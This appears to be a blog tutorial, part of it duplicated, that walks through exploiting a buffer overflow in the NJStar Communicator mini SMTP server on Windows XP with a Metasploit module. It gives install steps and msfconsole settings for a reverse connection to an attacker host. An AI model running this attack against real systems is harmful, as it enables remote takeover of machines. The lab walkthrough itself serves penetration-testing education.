Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Exploit Credit : Dillon Beresford
When I see this exploit 2 weeks ago I'm thinking why I never know about this software before?Because inside China itself, the most popular software for writing a Chinese character was Sogou. Maybe it's because this NJStar have English version so this software should be more popular for users outside China where they just start learn about Chinese Hanzi characters
This software also have a mini SMTP server to sending an e-mail, so just one click you can send an e-mail to every destination you want.
So how the exploit works?
According to metasploit.com this exploit will exploiting minismtp.exe because this is the only one NJStar component in memory and it's base starts with a 0×00.
2. NJstar SMTP Exploit
Mediafire.com
Victim IP Address : 192.168.8.94
1. Download the required file above(the application and exploit).
- Install the vulnerable application on your Windows XP SP3 machine.
- Copy the NJStar SMTP Exploit into your attacker machine and put in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you install your metasploit framework especially for Windows user)
2. Open your terminal(CTRL+ALT+T) and run metasploit console by typing msfconsole, then use the exploit we've just added before and do not forget do describe the payload also.
3. You can view the available switch by typing show options command from your msfconsole. In the picture below was my switch configuration to make the exploit works.
Information :
Pwn3D!!
Hope it's useful
nb : click the grey area of my affiliations box to view the download lin
i love indonesia
Level : Medium
Attacker O.S : Backtrack 5R1
Victim O.S : Windows XP SP3
Exploit Credit : Dillon Beresford
When I see this exploit 2 weeks ago I'm thinking why I never know about this software before?Because inside China itself, the most popular software for writing a Chinese character was Sogou. Maybe it's because this NJStar have English version so this software should be more popular for users outside China where they just start learn about Chinese Hanzi characters
This software also have a mini SMTP server to sending an e-mail, so just one click you can send an e-mail to every destination you want.
So how the exploit works?
According to metasploit.com this exploit will exploiting minismtp.exe because this is the only one NJStar component in memory and it's base starts with a 0×00.
Requirements :
1. NJstar 300 Communicator Mini SMTP Server application (press CTRL + Click my affiliations box to view the download link below)2. NJstar SMTP Exploit
Mediafire.com
Step by Step :
Attacker IP Address : 192.168.8.93Victim IP Address : 192.168.8.94
1. Download the required file above(the application and exploit).
- Install the vulnerable application on your Windows XP SP3 machine.
- Copy the NJStar SMTP Exploit into your attacker machine and put in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you install your metasploit framework especially for Windows user)
2. Open your terminal(CTRL+ALT+T) and run metasploit console by typing msfconsole, then use the exploit we've just added before and do not forget do describe the payload also.
3. You can view the available switch by typing show options command from your msfconsole. In the picture below was my switch configuration to make the exploit works.
Information :
msf exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP Address rhost => 192.168.8.94 msf exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set attacker IP Address to handle connection when exploit success lhost => 192.168.8.93 msf exploit(njstar_smtp_bof) > set lport 443 --> attacker local port to handle connection lport => 443 msf exploit(njstar_smtp_bof) > set target 0 --> set the target to windows xp sp2/sp3 target => 04. When everything has been set up nicely, now let's try the exploit is it works or not by running exploit command from your msfconsole.
Pwn3D!!
Countermeasures :
1. Update your NJStar Communicator to the latest version.Hope it's useful
nb : click the grey area of my affiliations box to view the download lin
i love indonesia
Posting Komentar
Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik